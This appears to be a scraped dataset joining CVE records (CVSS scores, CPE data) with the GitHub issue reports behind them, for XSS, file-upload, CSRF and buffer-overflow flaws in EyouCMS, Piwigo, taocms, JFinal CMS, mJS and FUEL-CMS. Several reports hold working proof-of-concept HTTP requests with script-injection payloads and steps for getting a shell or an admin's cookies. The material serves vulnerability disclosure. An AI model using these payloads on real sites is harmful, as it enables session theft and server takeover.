Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex
```
### Screen Shoot
<img width="1260" alt="image" src="https://user-images.githubusercontent.com/22876693/201619455-f28827d5-5826-4241-8fcd-9a7a8821f0d9.png">
> Reported by Srpopty, vulnerability discovered by using Corax.
| Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/38/comments | 1 | 2022-11-14T09:06:48Z | 2023-02-20T08:22:13Z | https://github.com/weng-xianhu/eyoucms/issues/38 | 1,447,664,065 | 38 |
CVE-2022-45540 | 2023-01-20T19:15:16.287 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in article type editor component in POST value "name" if the value contains a malformed UTF-8 char. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/37"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/37 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article type adding with reflected-XSS in the post value "name" when the value contains malformed UTF-8 chars, this xss payload will be showed in error reporting message.
### POC
```text
POST /cms/eyoucms/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Field&a=arctype_add&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
channel_id=-99&remark=af&dfvalue=&dtype=text&name=<script>alert(1)</script>%C0aef&title=aef
```
### Screen Shoot

> Reported by Srpopty, vulnerability discovered by using Corax.
| Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/37/comments | 1 | 2022-11-14T09:00:48Z | 2023-02-20T08:36:11Z | https://github.com/weng-xianhu/eyoucms/issues/37 | 1,447,653,340 | 37 |
CVE-2022-45541 | 2023-01-20T19:15:16.347 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article attribute editor component in POST value "value" if the value contains a non-integer char. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/36"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/36 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article attribute type changing with reflected-XSS in the post value "value" when the value contains non-integer char, this xss payload will be showed in error reporting message.
### POC
```text
POST /cms/eyoucms/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex; ENV_IS_UPHTML=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
value=%BA0<script>alert(1)</script>&field=status&id_value=1&id_name=id&table=archives_flag
```
### Screen Shoot

> Reported by Srpopty, vulnerability discovered by using Corax.
| Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/36/comments | 1 | 2022-11-14T08:56:29Z | 2023-02-20T10:01:25Z | https://github.com/weng-xianhu/eyoucms/issues/36 | 1,447,647,465 | 36 |
CVE-2022-45542 | 2023-01-20T19:15:16.400 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the FileManager component in GET parameter "filename" when editing any file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/33 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background file management editor with reflected-XSS in the get value "filename".
### POC
```text
GET /cms/eyoucms/login.php?m=admin&c=Filemanager&a=edit&filename=li|"><script>alert(1)</script><!--sts_media.htm&activepath=%3Atemplate%3Amobile&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Filemanager&a=index&activepath=%3Atemplate%3Amobile&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex
```
### Screen Shoot
<img width="1441" alt="image" src="https://user-images.githubusercontent.com/22876693/201612233-8e16dccb-774b-433b-b6f2-306216deb043.png">
> Reported by Srpopty, vulnerability discovered by using Corax.
| Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/33/comments | 1 | 2022-11-14T08:34:33Z | 2023-02-20T10:49:48Z | https://github.com/weng-xianhu/eyoucms/issues/33 | 1,447,617,306 | 33 |
CVE-2022-48007 | 2023-01-27T18:15:14.947 | A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1835"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D4CE9B7C-3D2B-4876-B8E3-5EE46628EA5C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Piwigo/Piwigo/issues/1835 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | Hello, I found Stored XSS in Piwigo version 13.4.0.
**Impact:**
In this way, ordinary users can be promoted to administrator users.
**Here are the complete attack steps:**
1. Register an ordinary user.

2. Sign out.
3. POST messages with burpsuite, and change User-Agent's data to xss-payload. Here's an example.
```
POST /src/piwigo/identification.php HTTP/1.1
Host: 192.168.2.153
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.153
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>alert(document.cookie);</script> (<svg+onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.153/src/piwigo/identification.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phavsz=1445x798x1.25; pwg_id=ocv8aqqvjkdcshuv99j8l3ctub; pwg_tags_per_page=100; pwg_album_manager_view=tile; PHPSESSID=pfjer613d8pnr8ou8uj458i837
Connection: close
username=w1nd&password=123456&remember_me=<svg+onload=alert(1)>&redirect=&login=%E6%8F%90%E4%BA%A4
```

4. Finally, when the administrator user logs in and visit /admin.php?page=user_activity, the stored xss will be triggered.
`/admin.php?page=user_activity`


Please fix the vulnerability & let me know :).
Thank You!
| Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent | https://api.github.com/repos/Piwigo/Piwigo/issues/1835/comments | 0 | 2022-12-21T08:21:08Z | 2022-12-25T10:25:36Z | https://github.com/Piwigo/Piwigo/issues/1835 | 1,505,891,189 | 1,835 |
CVE-2022-48006 | 2023-01-30T22:15:12.463 | An arbitrary file upload vulnerability in taocms v3.0.2 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploited via manipulation of the upext variable at /include/Model/Upload.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/35"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/taogogo/taocms/issues/35 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | This is the latest 3.0.2 version of taocms.
Organize and utilize steps in two steps:
Step1:
Audit the source code "include/Model/Upload.php", line 33, the filename extension can be controlled by modifying variable "upext":
<img width="1339" alt="image" src="https://user-images.githubusercontent.com/39691787/208852959-9a6c23b4-01be-4592-8f3d-0948b85de5ea.png">
Follow up in "include/Model/File.php", line 75, there is a $this->realpath and find that it comes from $this->path, and $this->path can be passed in through the get parameter (where SYS_ROOT is the root directory of the website):
<img width="1439" alt="image" src="https://user-images.githubusercontent.com/39691787/208853182-59b46a3e-2a38-4084-bb08-996363cb3d42.png">
Here any changes to the variable "upext" or file "Upload.php" can be saved by the method "save" which locates at "include/Model/File.php", line 73:
<img width="1439" alt="image" src="https://user-images.githubusercontent.com/39691787/208853836-2d4396cf-ec94-4fdb-921b-0523cc24faf9.png">
At this stage, you can add "php" filename extension to the variable "upext" and click "save" to save it:
<img width="1274" alt="image" src="https://user-images.githubusercontent.com/39691787/208854105-e8f57225-8b51-4599-86a2-ff0338a77b3a.png">
Step 2:
Next, you can upload any php file to the system:
<img width="756" alt="image" src="https://user-images.githubusercontent.com/39691787/208854359-84d18435-e9f9-4799-9051-80e761392163.png">
New a.php file is successfully uploaded:
<img width="994" alt="image" src="https://user-images.githubusercontent.com/39691787/208854618-62a32110-842e-429e-9468-8ddb28393f2e.png">
Once you uploaded file, you can open the file through the path "http://www.taocms.com:9090/a.php", and you can get shell of this system:
<img width="1065" alt="image" src="https://user-images.githubusercontent.com/39691787/208854924-60da59e5-3222-483b-8586-553e669f6b47.png">
| File upload vulnerability exists by modifying Upload.php configuration in backend. | https://api.github.com/repos/taogogo/taocms/issues/35/comments | 0 | 2022-12-21T08:22:48Z | 2022-12-21T08:22:48Z | https://github.com/taogogo/taocms/issues/35 | 1,505,893,165 | 35 |
CVE-2023-22975 | 2023-02-03T17:15:09.073 | A cross-site scripting (XSS) vulnerability in JFinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter under /front/person/profile.html. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/53"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jflyfox/jfinal_cms/issues/53 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | ## Summary
There is XSS vulnerability below!
The reason for the vulnerability is that there is no filter on user input. According to the guidelines of CMS, We can create a user, and we can control the user's account number, password and email and so on.....
## Exploition
After, There are many ways to trigger the vulnerability! The one is that we can make a comment and wait other users to click the user created by ourselves. The another one can get admin's secrect util admin login.
OK! We will create a user at first.

Press the submit button, we get a alert below

we can create a normal user account via this way, and then we can update the information


After we update the user's information, wo would wait!
When the admin user login, we can get its secrect!


| XSS vulnerability exists in jfinal_cms V5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/53/comments | 1 | 2022-12-29T15:35:31Z | 2022-12-29T15:35:55Z | https://github.com/jflyfox/jfinal_cms/issues/53 | 1,513,842,062 | 53 |
CVE-2021-36535 | 2023-02-03T18:15:10.653 | Buffer Overflow vulnerability in Cesanta mJS 1.26 allows remote attackers to cause a denial of service via crafted .js file to mjs_set_errorf. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/175"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/cesanta/mjs/issues/175 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ### Built:
Jun 30 2021
### Details:
heap-based buffer overflow **mjs.c:7617** in **mjs_set_errorf**
### Command:
./mjs -f Heap_Buffer_Overflow.js
### Result:
==2419050==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000178 at pc 0x55555557f3ed bp 0x7fffffffcf40 sp 0x7fffffffcf30
READ of size 8 at 0x604000000178 thread T0
#0 0x55555557f3ec in mjs_set_errorf /home/constantine/mjs/mjs.c:7617
#1 0x555555598395 in parse_literal /home/constantine/mjs/mjs.c:12166
#2 0x55555559861b in parse_call_dot_mem /home/constantine/mjs/mjs.c:12175
#3 0x5555555990d3 in parse_postfix /home/constantine/mjs/mjs.c:12209
#4 0x55555559932c in parse_unary /home/constantine/mjs/mjs.c:12228
#5 0x5555555995d1 in parse_mul_div_rem /home/constantine/mjs/mjs.c:12241
#6 0x555555599ba8 in parse_plus_minus /home/constantine/mjs/mjs.c:12246
#7 0x55555559a1c1 in parse_shifts /home/constantine/mjs/mjs.c:12251
#8 0x55555559a648 in parse_comparison /home/constantine/mjs/mjs.c:12255
#9 0x55555559a9bb in parse_equality /home/constantine/mjs/mjs.c:12259
#10 0x55555559ae46 in parse_bitwise_and /home/constantine/mjs/mjs.c:12264
#11 0x55555559b3ec in parse_bitwise_xor /home/constantine/mjs/mjs.c:12269
#12 0x55555559b992 in parse_bitwise_or /home/constantine/mjs/mjs.c:12274
#13 0x55555559bf38 in parse_logical_and /home/constantine/mjs/mjs.c:12279
#14 0x55555559c4de in parse_logical_or /home/constantine/mjs/mjs.c:12284
#15 0x7fffffffdc0f ([stack]+0x1fc0f)
Address 0x604000000178 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/constantine/mjs/mjs.c:7617 in mjs_set_errorf
Shadow bytes around the buggy address:
0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2419050==ABORTING
### PoC:
[Heap_Buffer_Overflow.js.tar.gz](https://github.com/cesanta/mjs/files/6738729/Heap_Buffer_Overflow.js.tar.gz)
| Heap-based Buffer Overflow Vulnerability | https://api.github.com/repos/cesanta/mjs/issues/175/comments | 4 | 2021-06-30T07:10:17Z | 2021-07-27T07:17:09Z | https://github.com/cesanta/mjs/issues/175 | 933,378,748 | 175 |
CVE-2021-36569 | 2023-02-03T18:15:11.290 | Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /users/delete/2. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/578"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/daylightstudio/FUEL-CMS/issues/578 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | Hi:
FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a user account via a post ID to /users/delete/2

POC:


| FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/578/comments | 0 | 2021-07-02T02:26:46Z | 2021-08-10T17:49:19Z | https://github.com/daylightstudio/FUEL-CMS/issues/578 | 935,354,402 | 578 |
CVE-2021-36570 | 2023-02-03T18:15:11.393 | Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /permissions/delete/2---. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/579"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
